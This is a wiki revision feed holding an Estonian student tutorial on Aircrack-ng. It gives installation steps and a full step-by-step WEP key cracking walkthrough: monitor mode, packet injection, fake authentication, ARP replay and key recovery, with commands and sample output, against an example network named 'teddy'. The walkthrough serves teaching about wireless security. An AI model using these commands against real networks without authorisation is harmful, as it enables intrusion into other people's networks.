&amp;lt;td&amp;gt; 1.0 &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;/table&amp;gt;&lt;/div&gt;</summary>
		<author><name>Ktragel</name></author>
	</entry>
	<entry>
		<id>https://wiki.itcollege.ee/index.php?title=Aircrack&amp;diff=89332</id>
		<title>Aircrack</title>
		<link rel="alternate" type="text/html" href="https://wiki.itcollege.ee/index.php?title=Aircrack&amp;diff=89332"/>
		<updated>2015-05-25T19:54:54Z</updated>

		<summary type="html">&lt;p&gt;Ktragel: /* Üldkirjeldus */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Sissejuhatus=&lt;br /&gt;
Käesoleva artikli eesmärgiks on tutvustada Aircrack-ng komplekti (sisaldab üle kümne väiksema tööriista) kuuluvat tööriista aircrack-ng. Artikkel hõlmab endas aircrack-ng installatsiooni- ja kasutusjuhendit. &lt;br /&gt;
&lt;br /&gt;
=Eeldused=&lt;br /&gt;
&lt;br /&gt;
* Elementaarne käsurea kasutamisoskus&lt;br /&gt;
* Teadmised WiFi, WEP, WPA/WPA2 kohta&lt;br /&gt;
* Võrgus vähemalt 1 aktiivne klient&lt;br /&gt;
* Ollakse füüsiliselt piisavalt lähedal pääsupunktile (ingl. k Access Point)&lt;br /&gt;
* Soovituslik on toimetada mõne Linuxi distributsiooni peal (ehkki aircrack-ng on konfigureeritav erinevatel platvormidel, ei pruugi kõik funktsionaalsused mitte Linux süsteemidel töötada)&lt;br /&gt;
* aircrack-ng tööle saamise eelduseks on “heaks kiidetud” WiFi adapter (rohkem infot: [http://aircrack-ng.org/doku.php?id=compatible_cards siit] ja [http://aircrack-ng.org/doku.php?id=compatibility_drivers siit])&lt;br /&gt;
&lt;br /&gt;
WiFi adapteri vaatamine:&lt;br /&gt;
&amp;lt;pre&amp;gt;lspci -nn | grep Network&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
või rohkema informatsiooni saamiseks:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;lshw -class network&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Tulemuseks saame midagi sarnast:&lt;br /&gt;
&amp;lt;pre&amp;gt;02:00.0 Network controller [0280]: Intel Corporation Centrino Advanced-N 6205 [Taylor Peak] [8086:0082] (rev 34)&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
või &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;*-network&lt;br /&gt;
       description: Wireless interface&lt;br /&gt;
       product: Centrino Advanced-N 6205 [Taylor Peak]&lt;br /&gt;
       vendor: Intel Corporation&lt;br /&gt;
       physical id: 0&lt;br /&gt;
       bus info: pci@0000:02:00.0&lt;br /&gt;
       logical name: wlan0&lt;br /&gt;
       version: 34&lt;br /&gt;
       serial: 6c:88:14:1d:29:c4&lt;br /&gt;
       width: 64 bits&lt;br /&gt;
       clock: 33MHz&lt;br /&gt;
       capabilities: pm msi pciexpress bus_master cap_list ethernet physical wireless&lt;br /&gt;
       configuration: broadcast=yes driver=iwlwifi driverversion=3.19.0-18-generic firmware=18.168.6.1 ip=192.168.1.93 latency=0 link=yes multicast=yes wireless=IEEE 802.11abgn&lt;br /&gt;
       resources: irq:32 memory:f7d00000-f7d01fff&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;&amp;lt;!-- Warning style viksitud ArchWikist --&amp;gt;div style=&amp;quot;padding: 5px; margin: 0.50em 0; background-color: #FFDDDD; border: thin solid #DDBBBB; overflow: hidden;&amp;quot;&amp;gt;&#039;&#039;&#039;Pane tähele! &#039;&#039;&#039;Antud juhend on koostatud kasutades Aircrack-ng 1.2 RC2 versiooni. &amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=Üldkirjeldus=&lt;br /&gt;
&lt;br /&gt;
aircrack-ng on 802.11 WEP ja WPA/WPA2-PSK võtmete lahtimurdmise programm&amp;lt;ref&amp;gt;[http://www.aircrack-ng.org/doku.php?id=aircrack-ng#description Description]&amp;lt;/ref&amp;gt;. Seda tuleb kasutada kombineerides ka teisi Aircrack-ng komplekti kuuluvaid mooduleid/tööriistu:&lt;br /&gt;
* airodump-ng - programm pakettide püüdmiseks &lt;br /&gt;
* aireplay-ng - programm pakettide „süstimiseks“ &lt;br /&gt;
* aircrack-ng - staatiline WEP ja WPA/WPA2-PSK võtmete lahti murdija&lt;br /&gt;
* airdecap-ng - WEP/WPA/WPA2 püütud failide dekrüpteerimiseks &lt;br /&gt;
&lt;br /&gt;
==Süntaks==&lt;br /&gt;
&lt;br /&gt;
aircrack-ng süntaks näeb välja järgmine&amp;lt;ref&amp;gt;[http://www.aircrack-ng.org/doku.php?id=aircrack-ng#usage Usage]&amp;lt;/ref&amp;gt;:&lt;br /&gt;
&amp;lt;pre&amp;gt;aircrack-ng [võti] &amp;lt;püütud fail(id)&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nimekirja võtmetele leiab [http://www.aircrack-ng.org/doku.php?id=aircrack-ng&amp;amp;DokuWiki=10da6035d1e79b0fb572490ff22d4b53#usage SIIT!]&lt;br /&gt;
&lt;br /&gt;
=Installeerimine=&lt;br /&gt;
&lt;br /&gt;
Uuendame repositooriumi:&lt;br /&gt;
&amp;lt;pre&amp;gt;sudo apt-get update&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Kasutame apt-i utiliiti, et paigaldada Aircrack-ng komplekt&amp;lt;ref&amp;gt;[http://askubuntu.com/questions/294651/step-by-step-guide-to-install-aircrack-ng-suite-on-ubuntu-12-04-lts Step by Step guide to install aircrack-ng suite on ubuntu 12.04 LTS [duplicate]]&amp;lt;/ref&amp;gt;:&lt;br /&gt;
&amp;lt;pre&amp;gt;sudo apt-get install aircrack-ng&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=WEP võtme murdmine=&lt;br /&gt;
&lt;br /&gt;
Alustuseks on soovitav üles märkida järgmised andmed, sest neid läheb meil ka edaspidi vaja&amp;lt;ref&amp;gt;[http://aircrack-ng.org/doku.php?id=simple_wep_crack#equipment_used Equipment used]&amp;lt;/ref&amp;gt;: &lt;br /&gt;
* Arvuti MAC aadress, mis jooksutab aircrack-ng&#039;d: 00:0F:B5:88:AC:82&lt;br /&gt;
* BSSID (pääsupunkti MAC aadress): 00:14:6C:7E:40:80&lt;br /&gt;
* ESSID (võrgu nimi): teddy&lt;br /&gt;
* Pääsupunkti kanal: 9&lt;br /&gt;
* Raadiovõrgu liides (ingl. k Wireless interface): ath0&lt;br /&gt;
&lt;br /&gt;
==Eesmärk==&lt;br /&gt;
Eesmärgiks on püüda kinni võimalikult palju initsialiseerimise vektoreid ehk IV-sid (ingl. k initialization vectors). Normaalse võrguliikluse (ingl. k network traffic) juures ei genereerita neid tavaliselt just väga kiiresti. Kuna keegi ei suuda meist aga pikalt kannatlik olla, siis kasutatakse siinkohal protsessi kiirendamiseks „süstimise“ (ingl. k injection) tehnikat. Sellisel juhul saadab pääsupunkt valitud pakette massiliselt uuesti ja uuesti, et oleks võimalik kinni püüda palju IV-sid võimalikult lühikese aja jooksul. Kui ka see on õnnestunud, siis saame kogutud IV-sid kasutada WEP võtme lahti murdmiseks&amp;lt;ref&amp;gt;[http://aircrack-ng.org/doku.php?id=simple_wep_crack#solution_overview Solution Overview]&amp;lt;/ref&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
==Lühikesed tegevussammud==&lt;br /&gt;
Lühidalt sammudest, mida tegema asume&amp;lt;ref&amp;gt;[http://aircrack-ng.org/doku.php?id=simple_wep_crack#solution_overview Solution Overview - the basic steps]&amp;lt;/ref&amp;gt;:&amp;lt;br&amp;gt;&lt;br /&gt;
1. Seadistame ennast kindlale pääsupunkti kanalile kuulamisrežiimi (ingl. k monitor mode)&amp;lt;br&amp;gt;&lt;br /&gt;
2. Testime „süstimise“ suutlikkust pääsupunktile &amp;lt;br&amp;gt;&lt;br /&gt;
3. Panna tööle airodump-ng pääsupunkti kanalil koos BSSID filtriga, et koguda IV-sid&amp;lt;br&amp;gt;&lt;br /&gt;
4. Kasutame aireplay-ng&#039;d vale autentimise läbiviimiseks pääsupunktiga &amp;lt;br&amp;gt;&lt;br /&gt;
5. Panna tööle aireplay-ng ARP päringute (ingl. k request) kordusrežiimis (ingl. k replay mode), et “süstida” pakette&amp;lt;br&amp;gt;&lt;br /&gt;
6. Kasutada aircrack-ng&#039;d salasõna lahti murdmiseks, kasutades seejuures ära kogutud IV-sid&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==Näide WEP võtme lahti murdmise protsessist==&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Samm1: Seadistame ennast kindlale pääsupunkti kanalile kuulamisrežiimi&#039;&#039;&#039;&amp;lt;ref&amp;gt;[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_1_-_start_the_wireless_interface_in_monitor_mode_on_ap_channel Step 1 - Start the wireless interface in monitor mode on AP channel]&amp;lt;/ref&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
Esmalt tuleb avada konsooli aken ning WiFi võrgukaart seadistada kuulamisrežiimi seisundisse. Selles režiimis kuulab kaart igat paketti (tavaliselt kuulab kaart vaid meile adresseeritud pakette). Igat paketti kuulates on võimalik valida välja mõned neist, et viia läbi „süstimine“.&lt;br /&gt;
 &lt;br /&gt;
Peata ath0 liides:&lt;br /&gt;
&amp;lt;pre&amp;gt;airmon-ng stop ath0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Tulemus:&lt;br /&gt;
&amp;lt;pre&amp;gt;Interface       Chipset         Driver&lt;br /&gt;
&lt;br /&gt;
wifi0           Atheros         madwifi-ng&lt;br /&gt;
ath0            Atheros         madwifi-ng VAP (parent: wifi0) (VAP destroyed)&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Kontrolli, kas kõik athX liidesed on ikka suletud:&lt;br /&gt;
&amp;lt;pre&amp;gt;iwconfig&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Tulemus:&lt;br /&gt;
&amp;lt;pre&amp;gt;lo        no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
eth0      no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
wifi0     no wireless extensions.&amp;lt;/pre&amp;gt;&lt;br /&gt;
&#039;&#039;&#039;Märge:&#039;&#039;&#039; Kui siiski vastusest tuli välja veel mõni athX liides, siis tuleb ka need ükshaaval &#039;&#039;airmon-ng stop athX&#039;&#039; käsuga sulgeda.&lt;br /&gt;
&lt;br /&gt;
Seadista võrgukaart 9-ndale kanalile kuulamisrežiimi:&lt;br /&gt;
&amp;lt;pre&amp;gt;airmon-ng start wifi0 9&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Pane tähele!&#039;&#039;&#039; Eelmises käsus kasutasime “wifi0”-i varasemalt üles märgitud võrguliidese “ath0” asemel, seda seetõttu, et kasutuses on madwifi-ng draiver (nähtav &#039;&#039;airmon-ng stop ath0&#039;&#039; käsu tulemuses). Juhul, kui kasutusel on mõni muu draiver, kasuta raadiovõrgu liidese nime, näiteks “wlan0” või “rausb0”.&lt;br /&gt;
&lt;br /&gt;
Tulemus: &lt;br /&gt;
&amp;lt;pre&amp;gt; Interface       Chipset         Driver&lt;br /&gt;
 &lt;br /&gt;
 wifi0           Atheros         madwifi-ng&lt;br /&gt;
 ath0            Atheros         madwifi-ng VAP (parent: wifi0) (monitor mode enabled)&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Pane tähele!&#039;&#039;&#039; “ath0” liides on märgitud nüüd kuulamisrežiimi.&lt;br /&gt;
&lt;br /&gt;
Veendumaks, et liides on korrektselt üles seatud:&lt;br /&gt;
&amp;lt;pre&amp;gt;iwconfig&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Tulemus:&lt;br /&gt;
&amp;lt;pre&amp;gt;lo        no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
wifi0     no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
eth0      no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
ath0      IEEE 802.11g  ESSID:&amp;quot;&amp;quot;  Nickname:&amp;quot;&amp;quot;&lt;br /&gt;
       Mode:Monitor  Frequency:2.452 GHz  Access Point: 00:0F:B5:88:AC:82   &lt;br /&gt;
       Bit Rate:0 kb/s   Tx-Power:18 dBm   Sensitivity=0/3  &lt;br /&gt;
       Retry:off   RTS thr:off   Fragment thr:off&lt;br /&gt;
       Encryption key:off&lt;br /&gt;
       Power Management:off&lt;br /&gt;
       Link Quality=0/94  Signal level=-95 dBm  Noise level=-95 dBm&lt;br /&gt;
       Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0&lt;br /&gt;
       Tx excessive retries:0  Invalid misc:0   Missed beacon:0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Kontrolli:&#039;&#039;&#039; Mode = Monitor; 2.452GHz = Channel 9; aircrack-ng&#039;d jooksutava arvuti MAC, mis on nähtav vaid madwifi-ng draiverite puhul, muidu mitte!&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;&#039;Samm 2: Testime „süstimise“ suutlikkust pääsupunktile&#039;&#039;&#039;&amp;lt;ref&amp;gt;[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_2_-_test_wireless_device_packet_injection Step 2 - Test Wireless Device Packet Injection]&amp;lt;/ref&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
Selle sammu eesmärgiks on selgitada välja, kas ollakse piisavalt lähedal pääsupunktile, et sinna pakette „süstida“.&lt;br /&gt;
 &lt;br /&gt;
Sisesta käsureale:&lt;br /&gt;
&amp;lt;pre&amp;gt;aireplay-ng -9 -e teddy -a 00:14:6C:7E:40:80  ath0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;Selgituseks:&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;-9 - “süstimise” test&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;-e teddy – raadiovõrgu nimi&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;-a 00:14:6C:7E:40:80 – pääsupunkti MAC aadress&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;ath0 – raadiovõrgu liides&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
Tulemus: &lt;br /&gt;
&amp;lt;pre&amp;gt;09:23:35  Waiting for beacon frame (BSSID: 00:14:6C:7E:40:80) on channel 9&lt;br /&gt;
09:23:35  Trying broadcast probe requests...&lt;br /&gt;
09:23:35  Injection is working!&lt;br /&gt;
09:23:37  Found 1 AP &lt;br /&gt;
&lt;br /&gt;
09:23:37  Trying directed probe requests...&lt;br /&gt;
09:23:37  00:14:6C:7E:40:80 - channel: 9 - &#039;teddy&#039;&lt;br /&gt;
09:23:39  Ping (min/avg/max): 1.827ms/68.145ms/111.610ms Power: 33.73&lt;br /&gt;
09:23:39  30/30: 100%&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Pane tähele!&#039;&#039;&#039; Viimane rida on eriti tähtis! Ideaalis peaks tulemus olema 100% või mõni muu väga kõrge protsent. Kui protsent on madal, siis ollakse pääsupunktist kas liiga kaugel või sellele liigagi lähedal. 0% märgib “süstimise” mitte toimimist ning sellisel juhul tuleks paigata (ingl. k patch) või kasutada hoopis muid draivereid.  &lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;&#039;Samm 3: Avada airodump-ng pakettide püüdmiseks&#039;&#039;&#039;&amp;lt;ref&amp;gt;[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_3_-_start_airodump-ng_to_capture_the_ivs Step 3 - Start airodump-ng to capture the IVs]&amp;lt;/ref&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
Ava uus konsooliaken ja sisesta: &lt;br /&gt;
&amp;lt;pre&amp;gt;airodump-ng -c 9 --bssid 00:14:6C:7E:40:80 -w output ath0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;Selgituseks:&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;-c 9 – raadiovõrgu kanal&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;--bssid 00:14:6C:7E:40:80 – pääsupunkti MAC aadressi ees olev võti ütleb, et antud aadress ei ole seotud ühegi pääsupunktiga, vaid otsib üht, kuhu ühenduda&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;-w output – võtmele järgneb faili nime prefiks, mis edaspidi sisaldab IV-sid&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
Hiljem, mil “süstimine” leiab aset, võib ekraanilt lugeda midagi sellist:&lt;br /&gt;
&amp;lt;pre&amp;gt;CH  9 ][ Elapsed: 8 mins ][ 2007-03-21 19:25 &lt;br /&gt;
                                                                                                              &lt;br /&gt;
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID&lt;br /&gt;
                                                                                                            &lt;br /&gt;
 00:14:6C:7E:40:80   42 100     5240   178307  338   9  54  WEP  WEP         teddy                           &lt;br /&gt;
                                                                                                            &lt;br /&gt;
 BSSID              STATION            PWR  Lost  Packets  Probes                                             &lt;br /&gt;
                                                                                                            &lt;br /&gt;
 00:14:6C:7E:40:80  00:0F:B5:88:AC:82   42     0   183782  &amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;&#039;Samm 4: Kasutame aireplay-ng&#039;d vale autentimise läbiviimiseks pääsupunktiga&#039;&#039;&#039;&amp;lt;ref&amp;gt;[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_4_-_use_aireplay-ng_to_do_a_fake_authentication_with_the_access_point Step 4 - Use aireplay-ng to do a fake authentication with the access point]&amp;lt;/ref&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
Ava uus konsooliaken ja sisesta:&lt;br /&gt;
&amp;lt;pre&amp;gt;aireplay-ng -1 0 -e teddy -a 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;Selgitus:&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;-1 – võlts autentimine&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;0 – kordusühendus(t)e aeg sekundites&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;-h 00:0F:B5:88:AC:82 – meie võrgukaardi MAC aadress&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
Õnnestumise korral on tulemus: &lt;br /&gt;
&amp;lt;pre&amp;gt;18:18:20  Sending Authentication Request&lt;br /&gt;
18:18:20  Authentication successful&lt;br /&gt;
18:18:20  Sending Association Request&lt;br /&gt;
18:18:20  Association successful :-)&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Ebaõnnestumise korral on tulemus: &lt;br /&gt;
&amp;lt;pre&amp;gt;8:28:02  Sending Authentication Request&lt;br /&gt;
18:28:02  Authentication successful&lt;br /&gt;
18:28:02  Sending Association Request&lt;br /&gt;
18:28:02  Association successful :-)&lt;br /&gt;
18:28:02  Got a deauthentication packet!&lt;br /&gt;
18:28:05  Sending Authentication Request&lt;br /&gt;
18:28:05  Authentication successful&lt;br /&gt;
18:28:05  Sending Association Request&lt;br /&gt;
18:28:10  Sending Authentication Request&lt;br /&gt;
18:28:10  Authentication successful&lt;br /&gt;
18:28:10  Sending Association Request&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;&#039;Samm 5: Ava aireplay-ng ARP päringute kordusrežiimis&#039;&#039;&#039;&amp;lt;ref&amp;gt;[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_5_-_start_aireplay-ng_in_arp_request_replay_mode Step 5 - Start aireplay-ng in ARP request replay mode]&amp;lt;/ref&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
Järgnevalt kasutatakse aireplay-ng’d meetodil, kus on võimalik kuulata ARP päringuid, et neid siis võrku tagasi „süstida“. &lt;br /&gt;
&lt;br /&gt;
Ava uus konsooliaken ja sisesta:&lt;br /&gt;
&amp;lt;pre&amp;gt;aireplay-ng -3 -b 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Tulemus: &lt;br /&gt;
&amp;lt;pre&amp;gt;Saving ARP requests in replay_arp-0321-191525.cap&lt;br /&gt;
You should also start airodump-ng to capture replies.&lt;br /&gt;
Read 629399 packets (got 316283 ARP requests), sent 210955 packets...&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;&#039;Samm 6: Ava aircrack-ng salasõna lahti murdmiseks&#039;&#039;&#039;&amp;lt;ref&amp;gt;[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_6_-_run_aircrack-ng_to_obtain_the_wep_key Step 6 - Run aircrack-ng to obtain the WEP key]&amp;lt;/ref&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
Viimaks pannakse tööle aircrack-ng, et saada kätte salasõna kogutud IV-de põhjal. &lt;br /&gt;
&lt;br /&gt;
Ava uus konsooliaken: &lt;br /&gt;
&amp;lt;pre&amp;gt;aircrack-ng -b 00:14:6C:7E:40:80 output*.cap&amp;lt;/pre&amp;gt;&lt;br /&gt;
&#039;&#039;&lt;br /&gt;
Selgitus:&lt;br /&gt;
&#039;&#039;-b 00:14:6C:7E:40:80 – MAC aadress märgib pääsupunkti, mis meile huvi pakub&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;output*.cap – märgib kõiki faile, mis algavad sõnaga “output” ning lõppevad “.cap”&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
Tulemus:&lt;br /&gt;
&amp;lt;pre&amp;gt;                             [00:03:06] Tested 674449 keys (got 96610 IVs)&lt;br /&gt;
&lt;br /&gt;
KB    depth   byte(vote)&lt;br /&gt;
 0    0/  9   12(  15) F9(  15) 47(  12) F7(  12) FE(  12) 1B(   5) 77(   5) A5(   3) F6(   3) 03(   0) &lt;br /&gt;
 1    0/  8   34(  61) E8(  27) E0(  24) 06(  18) 3B(  16) 4E(  15) E1(  15) 2D(  13) 89(  12) E4(  12) &lt;br /&gt;
 2    0/  2   56(  87) A6(  63) 15(  17) 02(  15) 6B(  15) E0(  15) AB(  13) 0E(  10) 17(  10) 27(  10) &lt;br /&gt;
 3    1/  5   78(  43) 1A(  20) 9B(  20) 4B(  17) 4A(  16) 2B(  15) 4D(  15) 58(  15) 6A(  15) 7C(  15) &lt;br /&gt;
&lt;br /&gt;
                      KEY FOUND! [ 12:34:56:78:90 ] &lt;br /&gt;
     Probability: 100%&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=Kokkuvõte=&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=Kasutatud kirjandus=&lt;br /&gt;
&amp;lt;references /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=Autor=&lt;br /&gt;
&lt;br /&gt;
Kelly Tragel [ISa 21]&amp;lt;br&amp;gt;&lt;br /&gt;
Viimati muudetud: 25.05.2015&lt;br /&gt;
&lt;br /&gt;
=Versioonide ajalugu=&lt;br /&gt;
&lt;br /&gt;
&amp;lt;table border=&amp;quot;1&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
&amp;lt;th&amp;gt; Kuupäev &amp;lt;/th&amp;gt;&lt;br /&gt;
&amp;lt;th&amp;gt; Versioon &amp;lt;/th&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt; 25.05.2015 &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt; 1.0 &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;/table&amp;gt;&lt;/div&gt;</summary>
		<author><name>Ktragel</name></author>
	</entry>
	<entry>
		<id>https://wiki.itcollege.ee/index.php?title=Aircrack&amp;diff=89330</id>
		<title>Aircrack</title>
		<link rel="alternate" type="text/html" href="https://wiki.itcollege.ee/index.php?title=Aircrack&amp;diff=89330"/>
		<updated>2015-05-25T19:53:14Z</updated>

		<summary type="html">&lt;p&gt;Ktragel: /* Süntaks */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Sissejuhatus=&lt;br /&gt;
Käesoleva artikli eesmärgiks on tutvustada Aircrack-ng komplekti (sisaldab üle kümne väiksema tööriista) kuuluvat tööriista aircrack-ng. Artikkel hõlmab endas aircrack-ng installatsiooni- ja kasutusjuhendit. &lt;br /&gt;
&lt;br /&gt;
=Eeldused=&lt;br /&gt;
&lt;br /&gt;
* Elementaarne käsurea kasutamisoskus&lt;br /&gt;
* Teadmised WiFi, WEP, WPA/WPA2 kohta&lt;br /&gt;
* Võrgus vähemalt 1 aktiivne klient&lt;br /&gt;
* Ollakse füüsiliselt piisavalt lähedal pääsupunktile (ingl. k Access Point)&lt;br /&gt;
* Soovituslik on toimetada mõne Linuxi distributsiooni peal (ehkki aircrack-ng on konfigureeritav erinevatel platvormidel, ei pruugi kõik funktsionaalsused mitte Linux süsteemidel töötada)&lt;br /&gt;
* aircrack-ng tööle saamise eelduseks on “heaks kiidetud” WiFi adapter (rohkem infot: [http://aircrack-ng.org/doku.php?id=compatible_cards siit] ja [http://aircrack-ng.org/doku.php?id=compatibility_drivers siit])&lt;br /&gt;
&lt;br /&gt;
WiFi adapteri vaatamine:&lt;br /&gt;
&amp;lt;pre&amp;gt;lspci -nn | grep Network&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
või rohkema informatsiooni saamiseks:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;lshw -class network&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Tulemuseks saame midagi sarnast:&lt;br /&gt;
&amp;lt;pre&amp;gt;02:00.0 Network controller [0280]: Intel Corporation Centrino Advanced-N 6205 [Taylor Peak] [8086:0082] (rev 34)&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
või &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;*-network&lt;br /&gt;
       description: Wireless interface&lt;br /&gt;
       product: Centrino Advanced-N 6205 [Taylor Peak]&lt;br /&gt;
       vendor: Intel Corporation&lt;br /&gt;
       physical id: 0&lt;br /&gt;
       bus info: pci@0000:02:00.0&lt;br /&gt;
       logical name: wlan0&lt;br /&gt;
       version: 34&lt;br /&gt;
       serial: 6c:88:14:1d:29:c4&lt;br /&gt;
       width: 64 bits&lt;br /&gt;
       clock: 33MHz&lt;br /&gt;
       capabilities: pm msi pciexpress bus_master cap_list ethernet physical wireless&lt;br /&gt;
       configuration: broadcast=yes driver=iwlwifi driverversion=3.19.0-18-generic firmware=18.168.6.1 ip=192.168.1.93 latency=0 link=yes multicast=yes wireless=IEEE 802.11abgn&lt;br /&gt;
       resources: irq:32 memory:f7d00000-f7d01fff&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;&amp;lt;!-- Warning style viksitud ArchWikist --&amp;gt;div style=&amp;quot;padding: 5px; margin: 0.50em 0; background-color: #FFDDDD; border: thin solid #DDBBBB; overflow: hidden;&amp;quot;&amp;gt;&#039;&#039;&#039;Pane tähele! &#039;&#039;&#039;Antud juhend on koostatud kasutades Aircrack-ng 1.2 RC2 versiooni. &amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=Üldkirjeldus=&lt;br /&gt;
&lt;br /&gt;
aircrack-ng on 802.11 WEP ja WPA/WPA2-PSK võtmete lahtimurdmise programm. Seda tuleb kasutada kombineerides ka teisi Aircrack-ng komplekti kuuluvaid mooduleid/tööriistu:&lt;br /&gt;
* airodump-ng - programm pakettide püüdmiseks &lt;br /&gt;
* aireplay-ng - programm pakettide „süstimiseks“ &lt;br /&gt;
* aircrack-ng - staatiline WEP ja WPA/WPA2-PSK võtmete lahti murdija&lt;br /&gt;
* airdecap-ng - WEP/WPA/WPA2 püütud failide dekrüpteerimiseks &lt;br /&gt;
&lt;br /&gt;
==Süntaks==&lt;br /&gt;
&lt;br /&gt;
aircrack-ng süntaks näeb välja järgmine&amp;lt;ref&amp;gt;[http://www.aircrack-ng.org/doku.php?id=aircrack-ng#usage Usage]&amp;lt;/ref&amp;gt;:&lt;br /&gt;
